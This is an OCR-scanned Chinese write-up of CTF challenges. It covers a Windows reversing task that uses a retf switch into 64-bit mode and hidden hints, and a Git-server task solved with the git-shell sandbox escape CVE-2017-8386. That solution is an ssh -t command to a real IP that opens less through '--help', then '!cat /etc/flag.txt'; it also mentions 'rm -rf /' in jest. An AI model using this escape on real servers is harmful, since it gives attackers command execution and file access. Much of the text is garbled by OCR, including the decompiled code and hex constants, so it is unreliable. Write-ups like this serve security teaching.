回头 看 switch 的 条 件 ，edx 是 由 div ecx 产生 的 ,而 ecx 是 一 个 定 值 0X51， 
eax 的 值 由 rdtscp 产生 .所 以 可 以 肯定 的 是 , 每 一 个 switch 的 结果 是 一 样 的 . 
我 们 不 妨 假 定 eax = 0 


这 时 候 需 要 看 一 看 CFG, 把 Options -> General -> Graph -> Max number of nodes 
改 高 一 点 , 按 space 切换 到 Graph View. 发 现 所 有 路 径 都 是 相同 的 一 条 线 下 来 . 到 
最 后 就 直接 retn 了 ,看 来 中 间 一 定 有 处 理 输入 的 指令 我 们 没有 发 现 . 


这 时 候 , 如 果 你 觉得 自己 是 欧 皇 的 话 , 随便 上 下 翻动 找 一 找 , 就 能 发 现 一 条 突 元 的 
call 指令 出 现 . 当然 如 果 你 试 了 很 久 , 还 没 发 现 , 然后 才 意 识 到 自己 并 不 是 欧 皇 ， 
就 请 使 用 下 面 的 方法 : 


我 们 注意 到 , 这 个 函数 里 面 的 指令 种 类 十 分 有 限 . 如 果 我 们 将 这 段 代码 的 十 六 进 制 
Dump 出 来 (可 以 用 010 Editor 来 做 , 不 过 要 自己 转换 RVA), 输入 到 Capstone 里 
面 反 汇编 , 然后 管道 到 unig ,就 能 看 到 一 个 call #4, call 的 那个 函数 就 是 
我 们 要 找 的 函数 ， 


当然 也 有 更 好 的 办 法 (虽然 我 更 希望 大 家 使 用 上 面 的 策 办 法 , 以 便 让 大 家 知道 IDA 的 
局 限 性 ): 在 函数 列表 里 面 查找 临近 的 函数 , 因为 编译 器 往往 会 把 一 个 .c 的 代码 编 
译 到 一 起 , 链接 器 也 会 使 得 程序 员 写 的 代码 相互 靠近 . 所 以 对 于 一 个 小 程序 而 言 ,一 
个 函数 要 调用 的 用 户 函 数 往往 在 它 附近 ， 


还 有 更 好 的 办 法 , 就 是 右键 -> Proximity browser, 这 个 会 把 函数 调用 图 清晰 地 画 出 
来 . 可 以 看 到 sub 401064() 调用 了 两 个 函数 , 一 个 sub 401006() 发 现 是 
sprintf() , 另 一 个 就 是 sub 46A4E8() 了 . 


进入 sub_46A4E8() , IDA 这 次 死活 分 析 不 对 了 . 我 们 来 看 一 看 汇编 : 


.text:0046A4EE mov edi, [ebp+8] 


. text :0046A4F1 mov eax, offset loc 46A665 
. text :0046A4F6 push 23h 

. text :0046A4F8 push eax 

. text :0046A4F9 push 33h 

. text :0046A4FB sub eax, 163h 

text :0046A500 push eax 

.text:0046A501 retf 


简单 分 析 一 下 , 大 概 这 样 的 : 


mov edi， 传 入 参数 
push 23h 

push Ox46A665 
push 33h 

push 0x46A502 
retf 


那么 这 个 retf CEFR? BETEN ET, A413] 3144 4l] Google. 这 里 我 先 
推荐 一 下 Intel developer manual, 如 果 做 PC 端 逆 向 的 人 不 看 这 本 书 , 可 以 说 成 为 
大 佬 的 一 条 路 就 封 死 了 . 


查阅 手册 可 以 知道 ，retf 的 作用 就 是 更 改 cs 寄存 器 然后 返回 . a 
32 位 的 程序 , 发 现 它 的 cs 寄存 器 的 值 是 0x23, 那么 把 cs KF) Ox33 有 什么 
吗 ,为 什么 IDA 就 无 法 反 汇 编 了 呢 ? 


继续 查阅 手册 , 我 们 发 现 段 寄存 器 里 面 装 的 是 Segment Selector, 而 Segment 
Selector 后 三 位 是 Table Indicator 和 Request Privilege Level. 而 0x33 代表 着 , 这 
个 Segment Descriptor 是 在 GDT 的 第 6 项 的 . 


为 了 找 出 GDT 里 面 第 6 RAKES, 我 们 参照 Microsoft 的 文档 , 给 我 们 虚拟 机 搭 
建 好 内 核 调试 环境 . 在 Host 上 使 用 Windbg 连接 上 内 核 调试 , 输入 dg 8 0x40 来 读 
取 GDT X: 


3: kd> dg 8 0x40 


Sel Base Limit Type 1 ze an es n 


0008 00000000 00000000 00000000 00000000 «Reserved» © Nb By Np N 
1 00000000 
0010 00000000 00000000 00000000 00000000 Code RE Ac © Nb By P L 
0 0000029b 
0018 00000000 00000000 00000000 00000000 Data RW Ac © Bg By P N 
1 00000493 
0020 00000000 00000000 00000000 ffffffff Code RE Ac 3 Bg Pg P N 
1 00000cfb 
0028 00000000 00000000 00000000 ffffffff Data RW Ac 3 Bg Pg P N 
1 00000cf3 
0030 00000000 00000000 00000000 00000000 Code RE Ac 3 Nb By P L 
o 000002fb 
0038 00000000'00000000 00000000'00000000 «Reserved» © Nb By Np N 
l 00000000 
0040 00000000'0e00f000 00000000'00000067 TSS32 Busy © Nb By P N 
l 0000008b 


可 以 看 到 , 第 4 个 和 第 6 个 Segment Descriptor 的 多 个 属性 段 都 不 相同 , 我 们 继续 
查阅 手册 , 发 现 Long 这 个 bit 代表 着 CPU 是 否 在 64-bit 模式 下 运行 ! 


所 以 可 以 确定 ，cs 寄存 器 为 0X33 时 , CPU 转 而 进入 64-bit RA. 而 代码 自然 是 
64 位 的 代码 . 至 此 , 一 切 水 落石 出 . IDA 误 将 其 当成 32 位 的 代码 进行 反 编 译 , 自然 会 
出 错 . 


回 到 本 题 上 来 , 一 切 非常 简单 . 将 0x46A502 到 0x46A665 的 代码 Dump 出 来 , 另存 
为 一 个 文件 , 开启 一 个 新 的 IDA 打开 , 设置 好 64 位 模式 和 ABI, 按 下 F5: 


do 


v5 = 4 * *input & Ox1F; 
*temp A= A2a[*input >> 3]; 
v6 = input[1]; 
temp[1] ^- A2a[((input[1] >> 6) + v5) & OxSF]; 
temp[2] ^= A2a[(unsigned | int8)(4 * v6) >> 3]; 
v7 = input[2]; 
temp[3] ^= A2a[((input[2] >> 4) + (16 * v6 & Ox1F)) & Ox3F]; 
temp[4] ^= A2a[((v7 >> 7) + (2 * v7 & Ox1F)) & Ox3F]; 
v8 - input[3]; 
temp[5] ^= A2a[(unsigned | int8)(2 * v8) >> 3]; 
v9 = input[4]; 
temp[6] ^- A2a[((input[4] >> 5) + (8 * v8 & Ox1F)) & Ox3F]; 
temp[7] ^= A2a[v9 & Ox1F]; 
temp += 8; 
input += 5; 
} 
while ( temp != temp_end ); 


其 中 A2a 是 个 长 度 32 的 从 'A' 到 'a' 的 数组 , 这 个 代码 大 概 将 每 5 个 输入 字符 转化 

为 8 个 A 到 a 之 间 的 字符 , 有 经 验 的 同学 能 够 直接 猜 出 来 这 是 一 个 Base 32 算法 . 
将 最 外 面 的 那 串 字符 串 拿 出 来 , 异 或 一 下 算法 中 的 几 个 常数 , 然后 随便 找 一 个 可 以 控 
制 字符 集 的 Base 32 解码 算法 就 可 以 了 . 


至 此 , 这 道 题 已 经 可 以 说 基本 做 完了 . 谢谢 观看 . 下 期 节目 再 见 


九条 线索 


我 曾经 说 过 这 道 题 有 9 条 线索 , 不 知 大 家 找到 了 .. 其 至 有 人 开始 怀疑 这 句 话 的 
ee ie 


0 


首先 strings reverse.exe (如 果 有 人 还 不 放心 , 可 以 使 用 FLOSS), 有 8 条 线索 
都 可 以 从 这 条 命令 里 面 看 出 来 : 


* rootQDDB -/Desktop > strings reverse.exe 
This program CAN be run in DOS mode. 


Hint: Change the max number of nodes to 10000 in IDA general opt 
ions 

Hint: Change graph background to black in IDA color options 
Hint: Switch to graph mode in IDA 


Hint: Decompilation will take a long time and the result may dis 
appoint you 


Welcome, master of debugger! Decoding one more hint... 


Hint: You should use a debugger supporting both x86 and x64 simu 
ltaneously like WinDBG does. 


Bagv:Ofpznjrvtnlahlgwrmbxixwkkabxyfmksdqxoumktypohlacypkulehwxdt 
onuaCqdlsuqugdzrybgnnicbgfasgysxznzxtjloklwtutyplijmjndqncjmayhl 
hcllrwzdxueugnydtiltdqpqulmgqseeollrvbzyonkfchsfty 

Vbznenay Vxwx: Qfgn dnz. Je cgwlt gxe iar. 


Hint: Xor the Base64 string with preset constants and then decode it. 
我 已 经 都 把 "CAN" X 5S 7... 为 啥 就 没 人 注意 到 33? 


一 般 的 程序 strings 一 下 是 什么 样 的 --- "This program cannot be run in DOS 
mode." 这 明显 不 一 样 好 吗 ... 这 个 程序 是 可 以 在 DOS 下 运行 的 , 安装 DOSBox 试 一 
下 , 运行 结果 就 是 一 个 Hint. 


不 信 奢 的 可 以 把 文件 拖 到 IDA 里 面 , 选择 DOS 格式 : 


seg000: 0000 
seg000:0000 start 
seg000: 0000 

seg000: 0001 

seg000: 0002 

seg000: 0002 

seg000: 0005 

seg000: 0008 
seg000:0008 loc_10008: 
Start+Flj 

seg000: 0008 

seg000: 000A 

seg000: 000C 

seg000: 000E 
seg000:000F 
seg000:0011 

seg000: 0014 
seg000:0016 
T STRING 

seg000:0016 

tring terminated by "$" 
seg000:0018 

seg000: 001B 

QUIT WITH EXIT CODE (EXIT) 
seg000:001B start 
code 


aoe 


2-5 


public start 


proc near 
push cs 

pop ds 

assume ds:seg000 
mov si, 1Dh 
mov ex, A5h | 
mov al, [si] 
xor al, OCCh 
mov [si], al 
inc si 

loop loc_10008 
mov dx, 1Dh 
mov ah, 9 

int 21h 

mov ax, ACO1h 
int 21h 

endp 


1 


. 
, 


, 


, 


CODE XREF: 


DOS - PRIN 


DS:DX -> S 


Hint: Change the max number of nodes to 10000 in IDA general options 


Hint: Change graph background to black in IDA color options 


Hint: Switch to graph mode in IDA 


Hint: Decompilation will take a long time and the result may disappoint you 


不 说 了 , 这 4 条 免费 . 
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Hint: Find the func returning 23333333h 


难 
到 


道 是 我 英文 水 平 问题 ? 为 哈 每 个 人 理解 这 句 话 的 意思 都 不 一 样 ... 我 的 意思 是 说 找 

返回 值 为 23333333h 的 函数 . 

an Hint 是 动态 解密 的 , 需要 调试 出 来 . 不 推荐 自己 手工 静态 解 , 因为 这 个 加 密 算法 
是 很 常见 , 叫 Grain, 有 兴趣 的 可 以 搜 一 搜 . 

调试 是 有 个 坑 的 , 不 知道 大 家 试 过 没有 . 不 过 有 些 坑 点 不 好 放 在 明 面 上 说 , 建议 大 家 

自己 回去 试 一 下 . 我 重新 实现 了 一 个 printf() Be, 并 把 检测 调试 的 代码 藏 在 里 

面 , 第 一 眼 估计 是 看 不 出 来 的 . 解决 倒是 很 好 解决 , 把 假 的 printf() nop #% 

行 了 . 或 者 各 种 插件 都 可 以 . 


ER, 这 个 解密 是 从 那个 仿 Base64 字符 串 里 面 解密 的 , 可 能 需要 手工 处 理 一 下 . 
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Hint: You should use a debugger supporting both x86 and x64 simultaneously 
like WinDBG does. 


这 个 Hint 直接 被 strings HAT, 不 过 不 在 代码 里 , 也 不 在 数据 里 , 所 以 IDA 可 能 找 
不 出 来 . 仔细 一 看 这 个 在 .rsrc BED, 是 某 音 频 的 一 部 分 , 这 件 事 本 身 也 是 提示 . 
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Hint: Just try to count number of different instructions in that enormous switch. 
Also maybe you should realize that there are reasons for this thirtytwo-bits 
program not being able to run on thirtytwo-bits machine. 


Dixitque Deus: Fiat lux. Et facta est lux. 


RS 483 


最 后 一 个 string, 大 家 不 觉得 很 奇怪 吗 ? 


如 果 大 家 看 一 看 区 段 表 , 会 发 现 除了 常见 的 ,text , .data 之 类 的 区 段 以 外 ,还 
多 了 一 个 ,vgnr BR, 区 段 里 面 就 是 那 最 后 一 个 string. 


这 个 区 段 名 称 就 很 有 提示 , 猜测 是 Vigenere 加 密 . 没 错 , 这 是 一 道 crypto 题 ! 随便 找 
一 个 破解 Vigenere 加 密 的 软件 (当然 也 可 以 自己 写 ), 我 推荐 CrypTool 2, 就 可 以 解 出 
来 这 个 Hint. 


解 出 来 里 面 还 有 一 句 看 不 懂 , 别 再 试图 继续 解 了 ... 那 是 一 名 拉丁 文 , 用 来 装 做 夫 佬 的 
样子 吓 吵 靖 新 混淆 词 频 的 . 
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Hint: This is not Base64 doesn't mean it has nothing to do with another base. 
最 后 一 个 提示 在 哪 呢 ? 
注意 到 第 7 个 Hint 其 实 是 音频 的 一 部 分 , 这 时 候 我 们 将 目光 转向 这 个 程序 的 图 标 .… 
RA, 这 个 程序 的 icon 是 一 张 被 隐 写 了 的 图 片 ! 


icon 由 多 幅 不 同 尺 寸 的 图 组 成 , 最 大 的 那个 尺寸 是 PNG, 里 面 LSB 隐 写 着 Hint. 


关于 表情 


很 多 人 很 好 奇 DA 里 面 那 个 表情 是 怎么 做 到 的 ... 其 实说 穿 了 也 很 简单 ,详情 可 以 看 
看 REpsych. 


实现 起 来 也 不 难 , 但 是 我 自己 写 的 代码 太 刁 太 长 ... 就 不 放出 来 了 .… 


Ja tE 


总 之 呢 , 布 望 大 家 做 这 道 题 能 够 感到 愉悦 ~ 做 了 一 点 微小 的 工作 , 谢谢 大 家 . 


目 己 的 Git RAS 


此 题 涉及 Git 服务 器 的 一 个 漏洞 。 


一 般 来 说 Git 服务 器 使 用 git-shell 来 禁止 用 户 SSH 登录 后 任意 操作 ， 但 是 git-shell 
的 白 名 单 中 有 三 条 指令 ， 分 别 是 git-receive-pack , git-upload-pack , 
git-upload-archive ， 它 们 均 可 以 接受 '--help' 参数 ， 使 得 我 们 可 以 进入 
man page. 


而 man page 实际 上 调用 了 pager > pager 一 般 来 说 默认 为 less， 也 就 是 说 我 们 最 
后 进入 的 用 来 浏览 手册 的 程序 是 less. 

查阅 less 的 手册 ，Security 的 章节 中 讨论 了 多 种 命令 执行 的 方式 ， 

如 : !command ， 这 里 ， 我 们 !cat /etc/flag.txt PP ° 

注 1: ssh 连接 的 时 候 ， 请 使 用 -t 确保 |ess 不 被 完全 展开 。 


注 2: 有 同学 想 知 道 怎么 做 到 只 能 执行 cat /etc/flag.txt 的 ， 答 : 魔 改 了 gnu 
less。 
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发 现 flag.txt 让 我 们 去 读 取  /etc/flag.txt 文件 后 ， 我 就 一 直 在 找 git 
clone 之 后 的 东西 有 没有 什么 破绽 ， 但 我 没有 找到 ， 就 搁置 在 一 边 了 。 后 来 看 到 
做 出 来 的 人 那么 多 ， 就 在 想 能 不 能 直接 用 git AP ssh 连 上 服务 器 ? 


FR id rsa 放 到 -/.ssh/ (我 自己 的 电脑 上 改名 为 hejiyan_rsa ， 因 为 我 
已 经 有 一 个 id_rsa 文件 了 ) ， 修 改 -/.ssh/config 


Host hejiyan 
HostName 118.89.174.234 
Port 2222 
IdentityFile -/.ssh/hejiyan_rsa 


> ssh git@hejiyan 

Qe ooo 000000 ooooo000000000000000000000000000000000000000 

Q WARNING: UNPROTECTED PRIVATE KEY FILE! Q 

Qoo 00000 ooo 000000000000 0000000000000000000000000 
Permissions 0644 for '/Users/tao/.ssh/hejiyan rsa' are too open. 
It is required that your private key files are NOT accessible by 
others. 

This private key will be ignored. 

Load key "/Users/tao/.ssh/hejiyan rsa": bad permissions 
git0118.89.174.234's password: 


好 好 好 ， 我 600 还 不 行 吗 。 (这 里 我 是 把 全 部 文件 删 掉 之 后 重新 试 的 ， 如 果 之 前 
尝试 过 其 他 思路 ， 那 么 权限 之 类 的 自己 应 该 已 经 设置 好 了 ) 


> chmod 600 -/.ssh/hejiyan rsa 


> ssh git@hejiyan 
fatal: unrecognized command '' 
Connection to 118.89.174.234 closed. 


这 是 什么 错误 ? 在 Google 上 搜索 : 


自己 的 Git 服务 


eu 
A 
er 
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Google ssh fatal: unrecognized command " & Q 


全 部 视频 新 闻 图 片 更 多 设置 工具 








找到 约 36,700 条 结果 (用 时 0.44 秒 ) 


restricting access to the gitolite users ssh (was: fatal: unrecognized .… 
https://groups.google.com/d/msg/gitolite/eL TiK8hvijo/9dKIBYfTSecJ v 翻译 此 页 

2015 年 2 月 19 日 - Hey folks. On Thu, 2015-02-19 at 07:49 +0530, Sitaram Chamarty wrote: > its nothing 
to do with gitolite; sshd tries to run whatever command it 


Re: [gitolite] fatal: unrecognized command "/opt/git/gitolite/src/gitolite ... 
https://groups.google.com/d/msg/gitolite/eLTiIK8hvijo/AC_Erj5GoHwJ v 翻译 此 页 
2015 年 2 月 22 日 Sorry no. Adding a "bug report" as advice is just confusing. I'll accept a markdown 
formatted file though (it'll go into the "contrib/" directory of the ... 


Git 详 解 之 四 : 服务 器 上 的 Git - 文章 - 伯乐 在 线 
blog.jobbole.col 
2012 年 8 月 28 日 - dit 可 以 使 用 四 种 主要 的 协 谨 来 传输 数据 : 本 地 传输 ，SSH 协议 ，Git 协议 ...... 0 fatal: 


unrecognized co 










Git 详 解 之 四 


0 fatal: 
unrecognized co 





GIT-SHELL 沙 盒 绕 过 (CVE-2017-8386) | 离别 歌 
https://www.leavesongs.com/PENETRATION/git-shell-cve-2017-8386.html v 

2017 年 5 月 12 日 - 正常 连接 其 ssh 服 务 ssh -p 3322 -i id_rsa git@127.0.0.1 ， 会 被 git-shell 给 拦截 ， 返 回 错 
误 fatal: unrecognized command " ， 并 且 连 接 被 关闭 。 


里 面 提 到 可 以 使 用 类 似 这 样 的 命令 来 打开 一 个 交互 式 的 man 界面 : 


2 ssh git@hejiyan -t "git-upload-archive '--help'" 


高 端的 吗 ? 还 是 17 年 的 漏洞 ? (还 是 谷歌 好 ， 必 应 和 百度 根本 搜 


注意 : -t 是 必须 的 ， 否 则 会 直接 返回 一 段 文本 ， 不 会 打开 交互 式 界 面 。 我 就 被 
这 个 问题 坑 了 半 个 小 时 。 ssh 文档 中 对 -t 的 解释 是 : 
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-t Force pseudo-terminal allocation. This can be used to 
execute 
arbitrary screen-based programs on a remote machine 
, which can be 
very useful, e.g. when implementing menu services. 


Multiple -t 
options force tty allocation, even if ssh has no lo 
cal tty. 
在 交互 式 界面 中 输入 : 


!Icat /etc/flag.txt 


来 看 到 我 们 的 flag : 





flag{Check_if_yOur_git_server_has_this_buuuuug} 


如 果 你 好 奇 是 否 可 以 运行 其 他 命令 的 话 (比如 ， rm -rf / --no-preserve- 
root ©) ...... 


PR VA 3X ME E EK ARAL NN A EEE BAR > AR RR > RAPS o 


道 题目 告诉 我 们 ， 平 时 千 万 不 要 拒绝 安全 补丁 ， 不 管 是 Windows 还 是 Linux 
) 


附 : 一 些 吐 模 


付 佳 伟 : 


一 张 纸 上 用 看 不 见 的 字 写 着 科大 学 生 家 长 的 日 常 。 他 们 要 从 被 入 侵 的 云端 中 辨别 站 
假 flag， 还 要 去 骚扰 你 的 一 位 老 学 长 。 让 他 玩 云 游戏 。 拿 到 老 学 长 被 加 密 的 实验 报 
告 后 用 简单 认证 解密 ， 他 们 开发 了 一 个 flag 验 证 器 ， 并 在 黑客 猜 奇 偶 的 时 候 听 到 了 
熟悉 的 声音 。 他 们 和 用 户 名 查询 系统 玩 Hide and Seek， 想 在 里 面 查 询 黑 客 猜 奇偶 
Frm ŽA KH RAB 7 BGM » 2 RABE ALE AR o MK AR EAS E 
币 ， 发 现 了 一 丝线 索 。 最 终 他 们 在 自己 的 Git 服 务 器 中 找到 了 答案 。 


CancerGary : 


第 一 次 这 么 正式 的 做 下 来 一 套 CTF 题 ， 感 党 还 是 太 弱 了 ， 知 识 育 区 有 待 覆盖 ...…….. 


AE au 


(汇编 、 、Web 等 等 等 ) 

这 些 题 给 了 我 一 股 搞 ACM/OI 题 目的 气息 ...... 

能 破 3k 还 是 要 感谢 google 和 大 腿 ( 

X 

2x writeup $ ART > XE E] X AR RD IR] AERLRE RT — 4d o 


fo "Bp: EA EU 尾声? 或 者 “时 间 之 外 ?就 更 有 感觉 


